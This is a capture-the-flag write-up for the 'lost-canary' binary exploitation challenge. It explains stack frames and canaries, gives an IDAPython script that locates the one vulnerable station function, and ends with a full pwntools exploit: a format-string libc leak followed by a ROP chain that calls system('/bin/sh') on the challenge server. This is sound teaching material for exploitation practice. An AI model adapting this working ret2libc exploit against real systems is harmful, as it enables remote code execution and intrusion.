# lost-canary

# Author: spicypete

1
2
3
Damn, I lost my canary at one of the train stations. Can you help me find it?

ncat --ssl lost-canary.chal.uiuc.tf 1337

1
2
3
4
5
6
Handout:    
ld-2.31.so
lost_canary
Makefile
libc-2.31.so
Dockerfile

tl; dr:

  • Reverse to find unique function not containing bad stack canary
  • Libc leak using format string vulnerability in printf
  • ROP chain to get shell

# Step 1: Initial Analysis

Okay, we have quite an interesting handout for your average RE challenge. Makefile, libc, linker and Dockerfile?

Oh yeah, this is also a pwn challenge. ๐Ÿ˜ƒ

I like to get as many ideas/as much information as I can from everything about or surrounding the challenge as I can, as it usually gives me ideas on what to look for when I start the actual analysis process on the binary.

So, keeping that in mind, let us first inspect the handout files other than the binary itself.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ cat Dockerfile
FROM ubuntu:20.04 as chroot
FROM gcr.io/kctf-docker/challenge@sha256:eb0f8c3b97460335f9820732a42702c2fa368f7d121a671c618b45bbeeadab28

COPY --from=chroot / /chroot
RUN mkdir -p /chroot/home/user
COPY ./lost_canary /chroot/home/user
COPY ./flag.txt /chroot/

COPY nsjail.cfg /home/user/

CMD kctf_setup && \
kctf_drop_privs \
socat \
TCP-LISTEN:1337,reuseaddr,fork \
EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/lost_canary"

Okay, this tells us there is a flag.txt file in the server, which gives us multiple methods of approaching this challenge already. We can narrow down this funnel as we further progress with the challenge, finalising on one approach in the end.

Next up, let us look at the Makefile

1
2
3
4
$ cat Makefile
main:
python3 gen-canary.py
gcc -O0 program.c -std=gnu99 -fno-stack-protector -Wno-deprecated-declarations -o lost_canary

What we see aligns with the name of the challenge as well. We can see that the challenge binary was compiled with the -fno-stack-protector option, what does that do?

Well, before we discuss that I think a small refresher on the stack would be nice.

# A Stack Refresher

(I will be using x86_64 as an example to explain)

The stack is used to store local variables (on a per-function basis) during program runtime.

alt text

It is also important to clarify the difference between 2 terms: "stack space" and "stack frame".

Stack space is the space allocated by your OS for your current program, there is one stack space assigned per program, which is some amount of space in the RAM.

Stack frame is the "stack" structure itself which is used up per-function in your program - each function has its own stack frame.
Stack frames are constructed and destructed for every function that executes, and there can only be ONE stack frame in the current context at any given time. That means, only one stack pointer ( rsp in x86-64), which points to the top of the stack - whichever is in the current context, and one base pointer ( rbp in x86-64), which points to the base of the stack in the current context.

So, if each function needs to have its own frame, we need a way to save each function's base and top pointers, right?

First, let us look at how a normal stack looks for a regular function (say main() )

alt text

(In actuality, the stack grows downwards in memory, i.e, the stack pointer is the one moving down when the base pointer stays constant above it, but I am just drawing it this way for easier visualisation)

Okay, now we need to see how each function can maintain it's own stack frame while the overall program still uses only 2 pointers - one for the current stack top and another for the current stack base.

Let us see how x86-64 handles this.

(I am assuming at least basic assembly knowledge at the time of writing this)

Okay, let us say we are in main, with source code as follows:

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>

int main(int argc, char *argv[])
{
int x = 5;
int y = 7;

/* Assume find_sum() is defined somewhere in the program */
find_sum(x, y);

return 0;
}

At the line of the call to find_sum() , the stack would have some values (these depend on the compiler you are using, but not of our concern anyways - what we are bothered with is the top and base pointers). Let us see the stack right before the call to find_sum() :

alt text

(Note: The rsp and rbp only point to the top and bottom, they do not contain the values at the bottom/top of the stack - those can be gotten by dereferencing these pointers)

So, the next line is our function call, let us see what happens.

First off, every function call is translated into assembly as a call instruction, which transfers control flow to a different part of the code.

1
2
3
4
5
6
7
8
9
# something like this
mov rdi, 5
mov rsi, 7
call find_sum

# remaining instructions in the program
mov eax, 0
leave
ret

We can see that there are also instructions after the call instruction, so once the different part of the code finishes executing, control flow would need to return to the next instruction ( mov eax, 0 , in our case).

Luckily for us, we have a register which tracks the address of the next instruction: rip . Let us use that.

To store rip temporarily, we can push it onto the stack.

The call instruction in x86-64 is actuall abstracted into 2 separate instructions: push rip and jmp rip , so the control flow of our program is transferred there.

Currently, our stack looks like this:

alt text

Now, what Intel does here is interesting.

First, the old value of rbp is pushed onto the stack

alt text

Now that the old rbp value is safe, the current top, is set as the new base (i.e, rsp and rbp now contain the same values, effectively pointing to the same address).

alt text
And now, the stack for the new function is set up! The function is free to use its frame however it pleases (as long as it does not use up all the stack space allocated by the OS!).

If we had to put what I just showed in pictures and translate it to assembly, it would look a little something like this:

1
2
3
4
5
# save the old value of rbp on the stack
push rbp

# rbp = rsp, effectively setting the new "base" to the previous "top"
mov rbp, rsp

Now, logically, returning from a function would follow the opposite steps as setting up a stack frame for a function.

First, the stack top pointer is brought down to the current base (opposite of what happened for setting up)

alt text

Next, the top value on the stack (which was the old base pointer) is popped into rbp . This effectively moves the base pointer back to where it previously was.

alt text

Next, the top value on the stack (which was the old value of rip ), is popped into rip (this is abstracted as the instruction: ret ).

alt text

And that's how it's done!

This is how you can use just 2 pointers to effectively have however many stack frames you want (1 per function).

Now, back to the challenge ๐Ÿ˜ƒ

# Analysis: continued

The -fno-stack-protector turns off the option to add a stack protection mechanism known as the "stack cookie" or the "stack canary". Why does the stack need protection, though?

Well, we have seen that, during a function call, the stack stores 2 critical values: the old base pointer ( rbp ) and the return address from where code flow needs to continue after the function call ( rip ). What if I can overwrite these values?

What if there are some library functions (for example: gets ), which use the stack as a buffer to store the value we give it, but do not perform any bound/size checks, and will accept any length of input and place it as it is on the stack? gets is one such example of a library function which does not care about the size of the input you give it, it will eat up as many characters as you give it.

This effectively means I can overwrite the rip with whatever value I want, meaning I control the flow of execution of the program going forward.

alt text

A stack canary is a kind of boundary wall that is used to prevent such attacks. It is a random value that is generated each time the program is run, and placed between the old rbp and any value(s) the function uses the stack for storing. So the new stack looks a little something like this:

alt text

The value of this canary is checked to see if it it was overwritten with something else. If it is not what it's supposed to be, the program simply exits. It is difficult (but not impossible in some cases), to beat this.

alt text

Next up, -Wno-deprecated-declarations - this just tells the compiler to keep quiet and not warn about any deprecated function(s) we might be using in our program.

# Step 2: Program Analysis

Before we try running the program, we need to make sure the binary is patched to refer to the linker and libc that we have been given in the handout. Luckily, there is a very handy tool for doing just this: pwninit.

Just install and run pwninit from the challenge directory and it will do the patching for you, and will generated a separate patched file, with the needed changes.

alt text

This is what we get from running the binary a couple of times, let us open it up in IDA.

Immediately, we can see a bunch of station_<number> functions, probably the function that gets called based on the station number we input, and it gets there using a jmp table. You can tell this because of the __asm { jmp rax } that IDA has placed in the pseudocode. You can recover any jump table in IDA if you notice this by following this blog.

In the select_station function itself, we can see there is a call to printf with the input that we give to the program. This is a format string vulnerability.

# What is a format string vulnerability?

In assembly, there is something known as a "calling convention". This refers to the places where any function looks at first when it is called, to know what arguments were passed to it.

In x86-64 the calling convention is as follows: rdi , rsi , rdx , rcx , r8 , r9 . If a function has more arguments than this, the stack is used for the remaining ones.

This just means that, printf (and all other functions) will look at these registers in these order, followed by the stack to know what it has to print out to the console.

Now in our program, the printf call is vulnerable because it does not inherently control how many values it prints out. Compare the following 2 printf calls:

1
2
3
printf("%s", arg);

printf(arg);

The first one is alright, because there is only 1 format specifier passed when printf() is called, and we cannot change that, but the second one is vulnerable - in the sense, we can print out however many values we want, in whatever format we want.

Before we get to exploiting this format string vulnerability, we also need to identify vulnerable functions, so how do we pick that?

# Step 3: Reversing

A little analysis shows us that there exist 3 different kind of functions, functions that:

  1. Take ticket code through gets()
  2. Take ticket code through fgets() , then use strcpy() to copy it elsewhere
  3. Take ticket code through scanf()

All 3 have some or the other kind of BOF (buffer overflow) vulnerability, but there is one thing to keep in mind about each function here:

  1. gets() stops taking input at the first newline ( 0xa )
  2. scanf() stops taking input at the first whitespace character in general
  3. strcpy() stops at the first null byte

(I kind of guessed that gets() would be the vulnerable function, it as well as could have been any other, in which case my script can be easily modified, but oh well)

Let us pick a random gets() function and examine it.

alt text

Seems pretty straightforward, except one thing: a predefined stack canary is being loaded, not by the compiler. Meaning, we have all the stack canary values already, we would not need to spend timing finding/leaking it ๐Ÿ˜ƒ

Of course, the author would not want things to be this easy, so let us examine the canary as well

1
__stack_chk_guard_10 = 0x456B0A4E4C74784F

Ahh, there is a newline in there.

This is an issue because, if we do end up exploiting the buffer overflow vulnerability in gets() , we would need to keep the canary intact so as to not have the program detect an overwrite and exit.
To do this, we would need to pass the canary as part of the input, and doing that would prematurely end the gets() function since there is also a newline in the canary.

Examining a couple more stations shows us that this is the case for every gets() function so far, as well as scanf() and strcpy() functions

So, we need to find a single function where this is not the case. For this, we can utilise IDA scripting with the IDAPython API.

Here is the general idea:

  1. Generate a list of all functions calling gets()
  2. Generate a list of all stack canaries without a newline
  3. Compare to see if there are common functions between the two lists

So let us write a script to do just that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import idautils

def find_xrefs_to(address):
'''
given an address, find all addresses calling that address
'''

xrefs = []
for ref in idautils.CodeRefsTo(address, 0):
xrefs.append(ref)
return xrefs


def get_stack_canaries():
'''
given the base address, generate a dictionary of in the format
{station_number: canary_value}
if the canary does not contain a newline
'''

data_addr = 0x555555C13010
canaries = []

dicky = {}
for i in range(32767):
canary = idaapi.get_bytes(i * 8 + data_addr, 8)
if b"\x0a" not in (canary):
dicky[i] = canary

return dicky

def get_func_names(xrefs):

'''
given all addresses calling _gets,
generate a list of all the station numbers
'''

calling_func_names = []
for i in xrefs:
func_name = idaapi.get_func(i)
func_addr = func_name.start_ea
calling_func_names.append(func_addr)

return calling_func_names
def main():
# address of the label _gets
gets_addr = 0x555555555180

# generate list of all addresses calling _gets
xrefs = find_xrefs_to(gets_addr)


# get the names of all the functions calling _gets
calling_gets = get_func_names(xrefs)

# get list of all the stack canaries not containing a newline
canaries = get_stack_canaries()

# retrieve just station numbers
station_numbers = canaries.keys()

# find out if any address lies in both generated lists
for i in station_numbers:
func_name = "station_" + str(i)
addr = idaapi.get_name_ea(0, func_name)
if addr in calling_gets:
print(hex(addr))

main()

And the output of this script gives us the address of station_14927 : the vulnerable one.

# Step 4: Exploiting

Now that we have the vulnerable function, let us get down to exploiting it. From the Dockerfile we saw earlier, the idea is to get a shell and do cat flag.txt , so let's see how we can do it.

Back to the format string vulnerability.

We know the printf() in select_station is vulnerable, and we know why. Let us view the register state before the printf() call in select_station

alt text

Running info proc mappings on GDB tells us what is mapped to where in virtual memory, so we can make use of that here

We can see that the address that rsi contains is actually a LIBC address!

We can assume ASLR is on for this program.

One interesting thing to note about ASLR is that while it does modify the actual addresses of variables and functions in your program, it usually does not touch the distance between these variables (this distance is also known as an "offset").

For example, if we run a program for the first time, and a variable x is at address 0x1000 , and a variable y is at 0x1050 , and we run this program for a second time, we would see that the address of the variable x has now changed to 0x1450 , but y remains a constant offset from it at 0x14a0 .

This is because it would take way too long for ASLR to randomise the locations of every single variable in a given program. What is does instead is randomise the base address of various memory mappings, one of which is LIBC.

We can utilise this fact to find the base address of libc every time the program is run. This is known as a ret2libc attack

There are 4 main steps to ret2libc attacks:

  1. Find an address that points to something in the libc by using something like a format string vulnerability
  2. Use the address above to calculate the base address of libc
  3. Calculate addresses of any libc functions we like using the base address
  4. Use a different exploit (BOF in our case) to overwrite the return address with the libc function we would like to jump to

Let us leak an address as an example, by running the program with the input "14927-%p-"

The output I get is: 0x7ffff7fc2723

alt text

All I have to do, is subtract the base address of the libc I have (highlighted in the screenshot), from it, to get the constant offset difference, which comes out to be: 0x1ed723 . I can use this information to get the base address of the libc every time the program is run now, through the format string vulnerability in main() .

Return Oriented Programming comes in handy when buffer overflows allow us to overwrite a program's call stack with what we want. Instead of us having to craft our own shellcode, all we have to do is take already existing pieces of code (known as "gadgets") and put them together to craft our exploit - we will see how we can do that.

These gadgets are usually short bursts of instructions tailored to do specific things, each ending with a ret instruction. We can utilise this to control execution flow as per our will.

The beauty of ROP comes from it's unique ability to harness code from any part of the binary (given it is executable).

First, we need to go gadget hunting to find what we need. Since we can write what we want to the stack, and we know rdi is the first place looked at by functions for their arguments, we would ideally want something that would allow us to pop the top value from the stack and into rdi , then perform a ret . Let us look for such an instruction in the libc with a tool known as ROPgadget.

1
2
3
4
$ ROPgadget --binary ./libc.so.6 | grep "pop rdi ; ret"
0x0000000000023b6a : pop rdi ; ret
0x00000000000f57ad : pop rdi ; retf
0x0000000000144ba9 : pop rdi ; retf 0xa

We can take the first one and ignore the rest. The output shows that at the offset 0x24b6a from the libc base, is the gadget we are looking for.

Next, we also need to find a ret instruction.

1
2
$ ROPgadget --binary ./libc.so.6 | awk '{print $1 $2 $3}' | grep ret
0x0000000000022679:ret

So ret is at 0x22679.

Now, we are ready to craft our payload that does the following:

  1. Send 4 "A"s and the canary to get to the return address on the stack
  2. Overwrite the return address on the stack with the pop rdi gadget
  3. Set the value of rdi to "/bin/sh"
  4. Overwrite the return address again with with the address of system

Let us see how this can be accomplished with a full fledged pwntools script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
from icecream import ic
import tty

# Set up pwntools for the correct architecture
exe = "./lost"
libc = ELF("./libc.so.6")
context.binary = elf = ELF(exe)
context.log_level = "debug"
context.aslr = True

def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.REMOTE:
return remote("lost-canary.chal.uiuc.tf", 1337, ssl=True )
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)

gdbscript = '''
b* select_station+104
c
'''.format(**locals())

# Useful macros
def sl(a): return r.sendline(a)
def s(a): return r.send(a)
def sa(a, b): return r.sendafter(a, b)
def sla(a, b): return r.sendlineafter(a, b)
def re(a): return r.recv(a)
def ru(a): return r.recvuntil(a)
def rl(): return r.recvline()
def i(): return r.interactive()
eof = chr(tty.CEOF)


r = start()

# send the payload to generate the libc leak
sl(b"14927-%p-")
ru(b"-")
libc.address = int(ru(b"-")[:-1], 16) - 0x1ed723


# get the address of the pop rdi gadget from the offset we got earlier
prdi = libc.address + 0x0000000000023b6a

# get the address of the ret gadget
ret = libc.address + 0x0000000000022679

# send the payload as we had seen above, to overwrite rip, replace rdi with "/bin/sh", and finally call system
sl(b"A"*(4) + p64(0x7361754569205965) + p64(0) + p64(ret) + p64(prdi) + p64(next(libc.search(b"/bin/sh\x00"))) + p64(libc.sym.system))

r.interactive()

So that is the entire challenge! A unique reversing + binary exploitation to top it all off.

If you guys have any questions about anything mentioned in the writeups, feel free to reach out to me on X/Twitter or on Discord at the.m3chanic . Cheers.